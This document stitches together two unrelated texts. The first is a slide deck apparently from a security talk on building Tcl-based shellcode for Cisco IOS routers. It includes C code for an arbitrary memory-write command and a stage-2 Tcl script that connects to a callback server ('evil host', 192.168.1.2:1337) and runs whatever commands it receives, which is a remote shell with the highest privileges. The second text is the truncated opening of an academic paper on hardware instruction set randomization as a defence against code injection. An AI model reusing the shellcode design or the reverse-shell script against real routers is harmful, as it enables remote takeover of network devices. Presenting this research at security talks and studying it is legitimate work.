CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Looking for the Tcl subsystem MoEvaEon	• To	reduce	the	search	Eme	• All	data	relaEng	to	the	Tcl	subsystem	is	located	below	the	header	• All	funcEons	relaEng	the	Tcl	subsystem	is	located		within	tcl_subsys_init	• Locate	all	subsystems	by	signature		C15C0515	C15C0515		• Find	the	Tcl	subsystem	by	name	“tcl”	subsystype_	<0xC15C0515,	0xC15C0515,		1,		0,		0,		"tcl",		2,		0,		1,		tcl_subsys_init,		Library,		0,		0,	0>		
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data		3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Find Tcl C API Table Tcl	C	API	• used	for	embedding	• used	for	extending	• Tcl	API		• To	abstract	the	specifics	of	the	plaorm,	a	funcEon’s	pointer	table	tclStubs	is	used		• We	can	get	address	of	tclStubs	by	looking	for	the	signature	0xFCA3BACF	#define	TCL_STUB_MAGIC		0xFCA3BACF	TclStubs	tclStubs		=		{		TCL_STUB_MAGIC,		&tclStubHooks,		Tcl_PkgProvideEx,		/*	0	*/		Tcl_PkgRequireEx,		/*	1	*/		Tcl_Panic,			/*	2	*/		.	.	.	Tcl_CreateCommand,		/*	91	*/	Tcl_CreateInterp,		/*	94	*/	Tcl_DeleteInterp,		/*	110	*/	Tcl_Eval,			/*	129	*/	Tcl_Exit,			/*	133	*/	.	.	.	}	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Determine address of a handler for an extension MoEvaEon	• We	want	to	use	the	Tcl	IOS	extensions		• We	already	have	(in	tclStubs	)	the	address	of	Tcl_CreateCommand	• So,	we	can	locate	all	the	places	where	it	is	called	• Then	we	can	get	the	handler’s	address	and	the		name	of	extension	by	disassembling				Tcl_Command	Tcl_CreateCommand	_(	Tcl_Interp	*	interp,		char	*	cmdName,		dTcl_CmdProc	*	proc,		ClientData	clientData,		Tcl_CmdDeleteProc	*	deleteProc);	3C	80	09	94	lis		r4,	aIos_config@h			#	"ios_config"	3C	A0	05	A7	lis		r5,	ios_config@ha	38	84	12	44	addi	r4,	r4,	aIos_config@l	#	cmdName	38	A5	DF	0C	addi	r5,	r5,	ios_config@l		#	cmdProc	38	C0	00	00	li			r6,	0									#	clientData	38	E0	00	00	li			r7,	0									#	deleteProc	7F	E3	FB	78	mr			r3,	r31							#	interp	48	01	0F	8D	bl			Tcl_CreateCommand	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Create your own Tcl command int	wmem(void*	clientData,	void*	interp,	int	argc,	char**	argv)			//	wmem	addr	value	{	Interp*	iPtr		=		(Interp	*)	interp;			unsigned	int*	ptr		=	NULL;	unsigned	int		value	=	0;	if(argc	!=	3)	{					iPtr->stubTable->tcl_AppendResult(interp,	"wrong	args",	(char	*)	NULL);					return	TCL_ERROR;		}	if(iPtr->stubTable->tcl_GetInt(interp,	argv[1],	&ptr)	!=	TCL_OK)	return	TCL_ERROR;	if(iPtr->stubTable->tcl_GetInt(interp,	argv[2],	&value)	!=	TCL_OK)	return	TCL_ERROR;	*ptr		=	value;	//	write	to	an	arbitrary	address	return	TCL_OK;	}	
CISCO IOS SHELLCODE:  ALL-IN-ONE Tcl Shellcode. How does it work? Stage	1	1. Determine	the	memory	layout	2. Look	for	the	Tcl	subsystem	in	.data	3. Find	a	Tcl	C	API	table	within	this	subsystem	4. Determine	addresses	of	all	handlers	for	Tcl	IOS		command	extension	5. Create	new	Tcl	commands	6. Create	new	Tcl	Interpreter	by	using	Tcl	C	API	7. Run	a	Tcl	script	from	memory			(script	is	integrated	in	shellcode)	Stage	2	1. Script	connects	to	the	“callback”	server	2. Evaluate	any	Tcl	expression	received	from	the	server	cisco	router	callback	server	listen	TCP(1337)	
evil	host	
Tcl Txt .text	
Tcl_Iterp	shellcode	script	

CISCO IOS SHELLCODE:  ALL-IN-ONE Run Tcl script from memory / Eval^2 void	shellcode()	{	.	.	.	Tcl_Interp*	interp	=	Tcl_CreateInterp();		Tcl_CmdProc*	tcl_exec	=		find_Tcl_command(subsys->init_address,	1MB,	"exec",				Tcl_CreateCommand);	if(tcl_exec	!=	NULL){		Tcl_CreateCommand(interp,	"exec",	tcl_exec,	0,	0);	}	Tcl_CreateCommand(interp,	"wmem",	wmem,	0,	0);	const	char*	script	=		#include	"./tcl/stage2.tcl"		;	Tcl_Eval(interp,	script);	.	.	.	}	#	./tcl/stage2.tcl		set	sockid	[	socket	"192.168.1.2"	1337]		while	{1}		{	flush	$sockid	set	line			[gets	$sockid]	catch	{eval	$line}	cmdres	puts	$sockid	$cmdres	}		close	$sockid	
CISCO IOS SHELLCODE:  ALL-IN-ONE Features / Properties / Limitations ProperEes	• Image-independent	• It’s	easy	to	port	to	other	CPU	architecture	• Approach	can	be	applied	to	Cisco	IOS	XE	• No	need	to	worry	about	a	watchdog	• Hijack	a	process	LimitaEons	• Tcl	is	not	everywhere	• The	relaEvely	large	size	(2KB	–	2.5KB)	• We	can	not	create	a	Tcl	server	• It	uses	an	open	channel	(TCP	connecEon)	Features	• We	have	a	shell	with	the	highest	level	of	privileges	• We	can	work	with	file	system	and	sockets	• We	can	read/write	memory:	• to	change	behavior	of	Cisco	IOS	• to	analyze	IOMEM	Advanced	Features	• Macro	Command	(e.g.	create	GRE	tunnel)	• AutomaEon	of	aUacks	• Reuse	other	TCl	tools	• ROMMON	Trojan	
CISCO IOS SHELLCODE:  ALL-IN-ONE Demo	0x02	
CISCO IOS SHELLCODE:  ALL-IN-ONE Conclusion 

CISCO IOS SHELLCODE:  ALL-IN-ONE The	End	
www.dsec.ru	gnosenko@dsec.ru		ASIST: Architectural Support for Instruction Set
Randomization
Antonis Papadogiannakis, Laertis Loutsis, Vassilis Papaef stathiou, Sotiris Ioannidis
Institute of Computer Science, Foundation for Research and Technology – Hellas
{papadog, laertis, papaef, sotiris}@ics.forth.gr
ABSTRACT
Codeinjection attacks continue topose athreat to today’s comput-
ing systems, as they exploit software vulnerabilities to inject and
execute arbitrary, malicious code. Instruction Set Randomization
(ISR) is able to protect a system against remote machine code in-
jection attacks by randomizing the instruction set of each process.
This way, the attacker will inject invalid code that will fail to exe-
cuteontherandomizedprocessor. However,alltheexistingimple-
mentations of ISR are based on emulators and binary instrumen-
tation tools that (i)incur a significant runtime performance over-
head,(ii)limittheeaseofdeploymentofISR, (iii)cannotprotect
the underlying operating system kernel, and (iv)are vulnerable to
evasionattempts tryingtobypass ISRprotection.
To address these issues we propose ASIST: an architecture with
hardwareandoperatingsystemsupportforISR.Wepresentthede-
sign and implementation of ASIST by modifying and mapping a
SPARC processor onto an FPGA board and running our modified
Linux kernel to support the new features. The operating system
loads the randomization key of each running process into a newly
defined register, and the modified processor decodes the process’s
instructions with this key before execution. Moreover, ASIST pro-
tects the system against attacks that exploit kernel vulnerabilities
to run arbitrary code with elevated privileges, by using a separate
randomization key for the operating system. We show that ASIST
transparentlyprotectsallapplicationsandtheoperatingsystemker-
nel from machine code injection attacks with less than 1.5% run-
timeoverhead, whileonly requiring0.7% additional hardware.
Categories andSubjectDescriptors
D.4.6[OperatingSystems ]: SecurityandProtection— Invasivesoft-
ware;C.0[General]: Hardware/softwareinterfaces;Systemarchi-
tectures
Keywords
Instruction Set Randomization; Code Injection Attacks; Architec-
turalSupport;Hardware Support;Security; Performance
Permission to make digital or hard copies of all or part of this work for personal or
classroom use is granted without fee provided that copies are not made or distrib uted
for profit or commercial advantage and that copies bear this notice and the full cita-
tion on the first page. Copyrights for components of this work owned by ot hers than
ACMmustbehonored. Abstractingwithcreditispermitted. Tocopyotherwise, orre-
publish, to post on servers or to redistribute to lists, requires prior speci fic permission
and/or a fee. Request permissions from permissions@acm.org.
CCS’13,November 4–8, 2013, Berlin, Germany.
Copyright 2013 ACM 978-1-4503-2477-9/13/11 ...$15.00.
http://dx.doi.org/10.1145/2508859.2516670.1. INTRODUCTION
Code injection attacks exploit software vulnerabilities to inject
and execute arbitrary malicious code, allowing the attacker to ob-
tain full access to the vulnerable system. There are several ways
to achieve arbitrary code execution through the exploitation of a
software vulnerability. The vast majority of code injection attacks
exploit vulnerabilities that allow the diversion of control flow to
the injected malicious code. Arbitrary code execution is also pos-
sible through the modification of non-control-data [ 17]. The most
commonly exploited vulnerabilities for code injection attacks are
buffer overflows [ 2]. Despite considerable research efforts [ 20,21,
23,25,50], buffer overflow vulnerabilities remain a major security
threat [18]. Other vulnerabilities that allow the corruption of criti-
cal data areformat-stringerrors[ 19] andinteger overflows [ 51].
Remotely exploitable vulnerabilities are continuously being dis-
coveredinpopularnetworkapplications[ 7,8]andoperatingsystem
kernels [3,4,6,16]. Thus, code injection attacks remain one of the
most common security threats [ 2], exposing significant challenges
to current security systems. For instance, the massive outbreak of
the Conficker worm in 2009 infected more than 10 million ma-
chinesworldwide[ 40]. LikemostoftheInternetworms,Conficker
wasbasedonatypicalcodeinjectionattackthatexploitedavulner-
ability in Windows RPC [ 5]. Along with the continuous discovery
of new remotely exploitable vulnerabilities and zero-day attacks,
the increasingcomplexity andsophisticated evasive methods ofat-
tack techniques [ 24,37] has significantly reduced the effectiveness
of attack detection systems.
Instruction Set Randomization (ISR) [ 9,10,13,29,31,41] has
been proposed to defend against anytype of code injection attack.
ISRrandomizestheinstructionsetofaprocessorsothatanattacker
is not able to know the processor’s “language” to inject meaning-
ful code. Therefore, any injected code will fail to accomplish the
desirable malicious behavior, probably resulting in invalid instruc-
tions. To prevent successful machine code injections, ISR tech-
niques encrypt the instructions of a possibly vulnerable program
with aprogram-specific key. This keyactually defines the valid in-
struction set for this program. The processor decrypts at runtime
everyinstructionoftherespectiveprocesswiththesamekey. Only
the correctly encrypted instructions will lead to the intended code
execution afterdecryption. Anyinjectedcodethatisnotencrypted
with thecorrect key willresultinirrelevant or invalidinstructions.
Existing ISR implementations use binary transformation tools
to encrypt the programs. For runtime decryption they use emula-
tors[13,31],ordynamicbinaryinstrumentationtools[ 9,10,29,41].
However, they have several limitations: (i)They incur a signifi-
cant runtime performance overhead due to the software emulator
or instrumentation tool. This overhead is prohibitive for a wide
adoptionofsuchtechniques. (ii)Deploymentislimitedbythene-
cessity of several tools, like emulators, and manual encryption of
theprogramsthatareprotectedwithISR. (iii)Theyarevulnerable
tocodeinjectionattacksintotheunderlyingemulatororinstrumen-
tation tools. More importantly, they do not protect against attacks
targeting kernel vulnerabilities [ 3,4,6,16], which are becoming an
increasingly attractive target for attackers. (iv)Most ISR imple-
mentations are vulnerable to evasion attacks aiming to guess the
encryption keyand bypass ISRprotection [ 48,53].
ToaddresstheseissuesweproposeASIST:ahardware/software
scheme to support ISR on top of an unmodified ISA. Hardware
extensions to enhance security have been proposed in the past [ 23,
28,44,50]. We advocate that hardware support for ISR is essential
to guard against code injection attacks, at both user- and kernel-
level,withoutincurringsignificantperformancepenaltyatruntime.
ASISTusesdistinctper-processkeysandanotherkeyfortheop-
erating system kernel’s code. To support runtime decryption at the
CPU,weproposetheuseoftwonewregistersintheASIST-enabled
processor: the oskeyandusrkeyregisters, which contain the ker-
nel’skeyandtheuser-levelkeyoftherunningprocess. Theseregis -
tersarememorymappedandtheyareonlyaccessiblebytheoperat-
ing system via privileged instructions. Our implementation for the
SPARCarchitecturemapstheseregistersintoanewAddressSpace
Identifier(ASI).Theoperatingsystemisresponsibleforreadingor
generating the key of each program at load time, and associating it
with the respective process. It is also responsible for storing at the
usrkeyregister the key of the next process scheduled for execution
at a context switch. Whenever a trap to kernel is called, the CPU
enters into supervisor mode and the value of the oskeyregister is
used to decrypt instructions. When the CPU is not in supervisor
mode,itdecrypts each instructionusingthe usrkeyregister.
We explore two possible choices for implementing the decryp-
tion unit at the instruction fetch pipeline stage of the modified pro-
cessor. We also implement two different encryption algorithms,
(i)XOR and (ii)Transposition, and use different key sizes. Ad-
ditionally, we compare two alternative techniques for encrypting
the executable code: (i)statically, by adding a new section in ELF
thatcontainsthekeyandencryptingallcodesectionswiththiskey
usingabinarytransformationtool,and (ii)dynamically,bygener-
atingarandomkeyatloadtimeandencryptingwiththiskeyatthe
pagefaulthandlerallthememorymappedpagesthatcontaincode.
The dynamic encryption approach can support dynamically linked
sharedlibraries,whereasstaticencryptionrequiresstaticallylinked
binaries. We discuss and evaluate the advantages of each approach
in terms of security and performance. Our modified processor can
also encrypt the return address at each function call and decrypt
it before returning to caller. This way, ASIST protects the system
from return-oriented programming (ROP) attacks [ 14,45], but not
fromjump-oriented programming (JOP)attacks [ 12].
To demonstrate the feasibility of our approach we present the
prototypeimplementationofASISTbymodifyingtheLeon3SPARC
V8processor[ 1],a32-bitopen-sourcesynthesizableprocessor[ 26].
We also modified the Linux kernel 3.8 to support the implemented
hardware features for ISR and evaluate our prototype. Our ex-
perimental evaluation results show that ASIST is able to prevent
code injection attacks practically without any performance over-
head, while adding less than 1% of additional hardware to support
ISR with our design. Our results also indicate that the proposed
dynamiccodeencryptionatthepagefaulthandlerdoesnotimpose
any significant overhead, due to the low page fault rate for pages
with executable code. This outcome makes our dynamic encryp-
tion approach very appealing, as it is able to transparently encrypt
anyexecutableprogram,itgeneratesadifferentrandomkeyateac h
execution,anditsupportssharedlibrarieswithnegligibleoverhead.Themaincontributions of thiswork are:
•WeproposeASIST:thefirsthardware-basedsupportforISR
topreventmachinecodeinjectionswithoutanyperformance
overhead. We demonstrate the feasibility of hardware-based
support for ISR by presenting the design, implementation,
and experimental evaluation of ASIST.
•Weintroduceadynamiccodeencryptiontechniquethattrans-
parently encrypts pages with executable code at the page
fault handler, using a randomly generated key for each exe-
cution. Weshowthatthistechniquesupportssharedlibraries
and does notimposesignificant overhead tothe system.
•We explore different choices for the decryption unit in hard-
ware, we compare static and dynamic encryption, as well as
different encryption algorithms and key sizes in order to im-
prove theresistanceof ISR againstevasion attempts.
•We show that a hardware-based ISR implementation, like
ASIST, is able to protect the system against attacks that ex-
ploitOS kernel vulnerabilities.
•We evaluated our prototype implementation with hardware-
enabled ISR and we showed that it is able to prevent code
injection attacks withnegligible overhead.
2. INSTRUCTIONSETRANDOMIZATION
In this section we describe our threat model, give some back-
ground on ISR, and discuss the main limitations of existing imple-
mentations thatemphasize theneed for hardware support.
2.1 ThreatModel
Remote and local machine code injection attacks. The threat
modelweaddressinthisworkistheremoteorlocalexploitationof
any software vulnerability that allows the diversion of the control
flow to execute arbitrary, malicious code. We address vulnerabili-
ties in the stack, heap, or BSS, e.g., any buffer overflow that over-
writes the return address, a function pointer, or any control data.
We focus on protecting the potentially vulnerable systems against
anytype of machine code injection attacks.
Kernel vulnerabilities. Remotely exploitable vulnerabilities on
the operating system kernel [ 3,4,6,16] are becoming an increas-
inglyattractivetargetforattackers. Ourthreatmodelincludescode
injectionattacksbasedonkernelvulnerabilities. Weproposeanar-
chitecture that is capable of protecting the operating system kernel
as well. We also address attacks that use a kernel vulnerability to
runuser-level code withelevated kernel privileges [ 32].
Return-to-libcandROPattacks. Insteadofinjectingnewcode
into a vulnerable program, an attacker can execute existing code
upon changing the control flow of a vulnerable system: re-direct
the execution to existing library functions, attacks typically known
asreturn-to-libc attacks [35], or use existing instruction sequences
ending with a retinstruction (called gadgets) to implement the at-
tack,atechniqueknownas return-orientedprogramming (ROP)[14,
45]. Although ISR protects a system against any type of code in-
jection attacks, its threat model does not address return-to-libc and
ROP attacks. Existing implementations of ISR follow this threat
model. However, due to the rise of such attacks, we aim to protect
systems fromthem usingthesame hardware.
Key guessing attacks. Existing ISR implementations are vul-
nerable to key guessing or key stealing attacks [ 48,53]. This way,
sophisticated attackers may be able to bypass the ISR protection
mechanism, by guessing the key and then injecting and executing
code that is correctly encoded with this key. In this work, we aim
to design and implement ISR in a way that it will be very difficult
for attackers toguess or infer thecode randomization key.
ISRImplementationRuntime
OverheadShared
LibrariesSelf-modifying
CodeHardware
SupportEncryptionDynamic
EncryptionKernel
ProtectionROPPrevention
Bochs emulator [ 31] High No No No XOR with 32-bit key No No No
Valgrind tool [ 9,10] High Yes API No XOR with random key Yes No No
Strata SDT [ 29] Medium No No No AES with 128-bit key No No No
EMUrand emulator [ 13]Medium No No No XOR with 32-bit key No No No
Pin tool [ 41] Medium Yes Partially No XOR with 16-bit key No No No
ASIST Zero Yes API YesXOR with 32-bit–128-bit key,
Transpositionwith160-bitkeyYes Yes Yes
Table1: ComparisonofASISTwithexistingISRimplementations. ASISTprovidesahardware-basedimplementationofISRwithout
runtimeoverhead, it supportsthenecessary features of curre nt systemsand protects against kernel vulnerabilities.
2.2 Defensewith ISR
ISR protects a system against any native code injection attacks.
To accomplish this, ISR uses per-process randomized instruction
sets. This way, the attacker cannot inject any meaningful code into
the memory of the vulnerable program. The injected code will not
perform the intended malicious behavior and will probably crash
afterjustafewinstructions[ 9]. ToapplytheISRidea,existingim-
plementations first encrypt the binary code of each program with
theprogram’ssecretkeybeforeitisloadedforexecution. Thepro-
gram’skeydefinesthemappingoftheencryptedinstructionstothe
real instructions supported by the CPU. Then, at runtime, the ran-
domized processor decrypts every instruction with the proper pro-
gram’s key before execution. Injected instruction sequences that
havenotbeencorrectlyencryptedwillresultinirrelevantorinvalid
instructionsaftertheobligatorydecryption. Ontheotherhand,cor-
rectlyencrypted code will bedecrypted and executed normally.
2.3 Limitations of ExistingImplementations
Existing ISR Implementations use binary transformation tools,
such asobjcopy , to encrypt the code of user-level programs that
will be protected. For runtime decryption they use emulators [ 33]
ordynamicbinaryinstrumentationtools[ 34,36,42]. InTable 1we
listand compare allthe existingISRimplementations.
Kcetal.[ 31]implementedISRbymodifyingthe Bochsemula-
tor[33]usingXORwitha32-bitkeyintheirprototype. Theuseof
anemulatorresultsinsignificantslowdown,upto290timesslower
executiononCPUintensiveapplications. Barrantesetal.[ 9,10]use
Valgrind [36] to decrypt applications’ code, which is encrypted
with XOR and a random key equal to the program’s length. This
prototypesupportssharedlibrariesbycopyingeachrandomizedli-
braryperprocess,andoffersanAPIforself-modifyingcode. Ho w-
ever, the performance overhead with Valgrind is also very high, up
to 2.9 times slower than native execution. Hu et al. [ 29] imple-
mented ISR with a software dynamic translation tool [ 42] using
AES encryption with 128-bit key size. Dynamic translation results
in lower but still significant performance overhead, that is close to
17%onaverageandashighas250%. Toreduceruntimeoverhead,
Boyd et al. [ 13] proposed a selective ISR that limits the emulated
andrandomizedexecutiononlytocodesectionsthataremorelikely
to contain a vulnerability. Portokalidis and Keromytis [ 41] imple-
mented ISR with shared libraries support using Pin [ 34]. The run-
time overhead ranges from 10% to 75% for popular applications,
while it has four-times slower execution when memory protection
isapplied toPin’s code.
Themain limitations of theexistingISR implementations are:
1.High runtime performance overhead. All the existing im-
plementations of ISR have a considerable runtime overhead,
whichbecomessignificantlyhigherforCPU-intensiveappli-
cations. This is because all the proposed systems use ex-
tra software to emulate or translate the instructions before
they are executed, which results to more instructions and in-creased execution times. We argue that the most efficient
approach is ahardware-based implementation of ISR.
2.Deployment difficulties. The need for several tools, such as
emulators and binary instrumentation tools, as well as the
needformanualencryptionandthepartialsupportforshared
libraries limit the ease of deployment of ISR. On the other
hand,weaimtobuildasystemthatwilltransparentlyprotect
any programwithout modifications.
3.Cannot protect kernel vulnerabilities. None of the existing
ISR prototype implementations is able to defend against at-
tacks exploiting kernel vulnerabilities [ 3,4,6,16,32]. Such
attacks are getting increasingly popular and allow attackers
toruncodewithkernelprivileges. AlthoughPinhasbeenex-
tended with PinOS to instrument kernel’s code as well [ 15],
ithasnotbeenusedtoimplementISRsupportforthekernel.
Eveninthiscase,thecodeofPinOSwouldnotbeprotected,
while the use of a virtual machine in PinOS would impose a
significantperformance overhead.
4.Cannot prevent ROP attacks. ISR cannot protect a vulner-
able program against ROP attacks [ 14,45], which use ex-
isting code to harm the system. This is because ISR was
proposed to prevent code injection attacks, not code-reuse
attacks. However, due to the rise of such attacks recently,
we would like to easily extend an ISR system to provide de-
fenses againstROP attacks.
5.Evasion attacks by guessing the encryption key. Many of
the proposed ISR implementations are vulnerable to evasion
attacks that try to guess the encryption key and inject valid
codeintothevulnerablesystem[ 48,53]. Sovareletal.[ 48]
demonstratethefeasibilityofanincrementalattackthatuses
partial key guessing to reduce the number of tries needed to
find the key. Also, attackers may be able to steal or infer the
encryption key when memorysecrecy breaks [ 53].
To put our work into context, we compare ASIST with other
ISR implementations in Table 1. ASIST is the only ISR imple-
mentation with hardware support, resulting in negligible runtime
overhead for any type of applications. ASIST also supports a new
dynamic code encryption approach that allows the transparent en-
cryptionofanyapplicationwithsharedlibraries. Todefendagainst
attempts to guess or steal the encryption key, ASIST (i)stores the
encryption key in a hardware register accessible only by the kernel
through privileged instructions, and avoids storing the key in pro-
cess’s memory, (ii)generates a new random key at each execution
of the same program when dynamic encryption is used, (iii)sup-
portslargekeysizesupto128-bit,and (iv)besidesXORandtrans-
position(alreadyimplemented),itsupportsmoresecureencryption
algorithms in case of memory disclosure. Moreover, ASIST pre-
ventstheexecutionofinjectedcodeatthekernelbyusingseparate
keys for user-level programs and kernel’s code. Finally, ASIST is
able toprevent ROP attacks usingreturnaddress encryption.
Process Table
Scheduler
Encrypted 
Binary Asta [%key] %asi, %addrcontext switch
ExecuteInstruction 
DecodeInstruction 
FetchRegister 
AccessMemory Exception Write-back
MMU
I/O Bu s
DDR 
ControlerASI
D-cacheI-cac he
Decrypt
Encrypted 
instructionskeyusrkey 
registerSupervisor
key
data
Main 
MemoryEncrypted 
Binary BEncrypted 
Binary Cprocess A key Aprocess B key Bprocess C key C
Encrypted 
Application Binary A
execve()
load_elf_binary()
asist_mode A=static
key A=read_key()Unmodified 
Application Binary B
execve()
load_e lf_binary()
asist_mode B=dynamic
key B=random_key()Unmodified 
Application Binary C
execve()
load_elf_bina ry()
asist_mode C=dynamic
key C=random_key()
DiskDisk Disk
CPU
text page faultASI registers
D Q
EN
oskey 
registerD Q
EN
__do_f ault()
if (text_fault && asist_mode B==dynamic) { 
new_page=alloc_page_ vma(...); // anonymous page
copy_encrypted(new_page, f_page,  key B, ...);
//copy, encrypt, and map n ew anonymous page
}Unencrypted 
instructions
Page fault  handl er:
Disk
Figure 1: ASIST architecture. The operating system reads the
key from the ELF binary (static encryption) or randomly gen-
erates a new key (dynamic encryption), saves the key in the
process table, and stores the key of the running process in the
usrkeyregister. The processor decrypts each instruction with
usrkeyoroskeyregister, according tothe supervisor bit.
3. ASISTARCHITECTURE
Ourarchitecturespanshardware,operatingsystemanduserspace
(see Figure 1), to support hardware-assisted ISR. ASIST supports
two alternative ways of code encryption: static and dynamic. In
static encryption, the key is pre-defined and exists within the exe-
cutable file, while all code sections are already encrypted with this
key. In case of dynamic encryption, the executable file is unmodi-
fiedandthekeyisdecidedrandomlybytherespectiveloaderofthe
operatingsystematthebeginningofeachexecution. Thecodesec-
tions are encrypted dynamically at runtime whenever a code page
is requested from file system and before this page gets mapped to
theprocess’svirtual addressspace.
The processor has been extended with two new registers: usrkey
andoskey, which store the keys of the running user-level process
and operating system kernel’s code respectively. The operating
system keeps the key of each process in a respective field in the
process table, and stores the key of the next process that is sched-
uled for execution in the usrkeyregister using the staprivileged
SPARCinstruction. Moreover,theprocessorismodifiedtodecrypt
eachinstructionbeforetheinstructionfetchcycle, usingoneofthe
above tworegisters as akey, according to thesupervisor bit.ELF header
Program header table
.text
Secti on header tabl e.note.asist
.init
.fini
.rodata
...
.data
.bss
...ELF header
Program header tabl e
.text
Section header table.init
.fini
.rodata
...
.data
.bss
...ELF file before the encryption ELF fi le after the encryption
New section
Encrypted section.sect ion ".note.asis t", "a"
.p2align 2
.long 1f -0f # name  size
.long 3f -2f # desc size
.long 0x2 # type  
0:  .asc iz "ASIST " # name
1:  .p2a lign 2
2:  .long  0x01234567 # desc (key)
3:  .p2a lign 2
Figure 2: The ELF format of a statically encrypted executable
file.The key is stored in a new note section inside the ELF file,
and allthe codesections are encrypted with thiskey.
3.1 Encryption
We support two possible options for encrypting an executable
program: static and dynamic encryption. In static encryption, the
programisencryptedbeforeeachexecutionwithapre-definedkey.
In dynamic encryption, a key is randomly generated at the binary
loader, and all code pages are encrypted with this key at the page
faulthandlerbeforetheyaremappedtotheprocess’saddressspac e.
The main advantage of static code encryption is that it has no
runtime overhead. However, this approach has several drawbacks .
First, the same key is used for each execution, which makes it sus-
ceptibletobruteforceattackstryingtoguessthiskey. Second,each
executable file needs to be encrypted before running. Third, static
encryption does not support shared libraries; all programs must be
statically linked with all necessary libraries. In contrast, dynamic
encryption has a number of advantages: it generates a random key
at each execution so it cannot be easily guessed, it encrypts all ex-
ecutables transparently without the need to run an encryption pro-
gram, and it is able to support shared libraries. The drawback of
dynamic encryption is a potential runtime overhead to encrypt a
code page when it is loaded to memory at a code page fault. In
Section5we show that due to the low number of code page faults,
dynamic encryption isvery efficient.
3.1.1 Static BinaryEncryption
To statically encrypt an ELF executable we extended objcopy
with a new flag ( --encrypt-code ). The encryption key can
be provided by the user, else it is randomly chosen by the tool.
Figure2shows the modifications of a statically encrypted ELF ex-
ecutable file. We add a new note section ( .note.asist ) inside
the encrypted ELF file that contains the program’s encryption key.
WealsochangedtheELFbinaryloaderintheLinuxkerneltoread
the note section from the ELF, get the key, and store it in a new
field(key)ofthecurrentprocess. Inthismodeofoperationweset
anewfieldperprocess( asist_mode )tostatic. Thekeyisstored
in the process table and is used by the kernel to update the usrkey
hardwareregistereachtimethisprocessisscheduledforexecution.
Our static encryption tool also finds and encrypts all the code
sections in ELF. Therefore, all needed libraries must be statically
linked, tobe properlyencrypted. Moreover, itisimportanttocom-
pletelyseparatecodefromdataintodifferentsectionsbythelinker.
Thisisbecausetheencryptionofanydata,whicharenotdecrypted
by the modified processor, will probably disrupt the program ex-
ecution. Fortunately, many linkers are configured this way. Sim-
ilarly, compiler optimizations like jump tables , which are used to
perform faster switch statements with indirect jumps, should be
alsomoved toaseparate, non-code section.
To address the issue of using the same key at all executions,
which may facilitate a key guessing attack, one approach could be
to re-encrypt the binary after a process crash. Another approach
could be to encrypt the original binary at the user-level part of
execve() , by randomly generating a new key and copying the
binaryintoanencrypted one. However, wedonotrecommend this
approach due to the extra time needed to copy and encrypt the en-
tire binary at load time, especially for large binaries that are also
staticallylinkedwithlargelibraries. Encryptingtheentirebinaryis
probably an unnecessary overhead, as many parts of the code that
willbeencrypted areunlikely tobe actually executed.
3.1.2 DynamicCodeEncryption
Wenowintroduceanewtechniquetodynamicallyencryptapro-
gram’s code before it is loaded into the process’s memory. This
approach is based on the fact that every page with executable code
will be loaded from disk (or buffer cache) to the process’s address
space the first time it is accessed by the program through a page
fault. Thus, we decided to perform the code encryption at this
point. Thisway,ASISTencryptsonlythecodepagesthatareactu-
allyusedby theprogramat each execution.
First, the ELF binary loader is modified to randomly generate
a new key, which is stored into the process table. It also sets the
asist_mode field of the current process to dynamic. The code
encryption is performed by the page fault handler at a text page
fault, i.e., on a page containing executable code, if the process that
isresponsibleforthepagefaultusesdynamicencryptionaccording
toasist_mode . Then, a new anonymous page is allocated, and
the code page fetched from disk (or buffer cache) is encrypted and
copied on this page using the process’s encryption key. The new
page isfinally mapped totheprocess’s address space.
We allocate an anonymous page, i.e., a page that is not backed
by a file, and copy the encrypted code on this page, so that the
changes will not be stored at the original binary file. Although
processes running the same code could share the respective code
pages in physical memory, we have a separate copy of each page
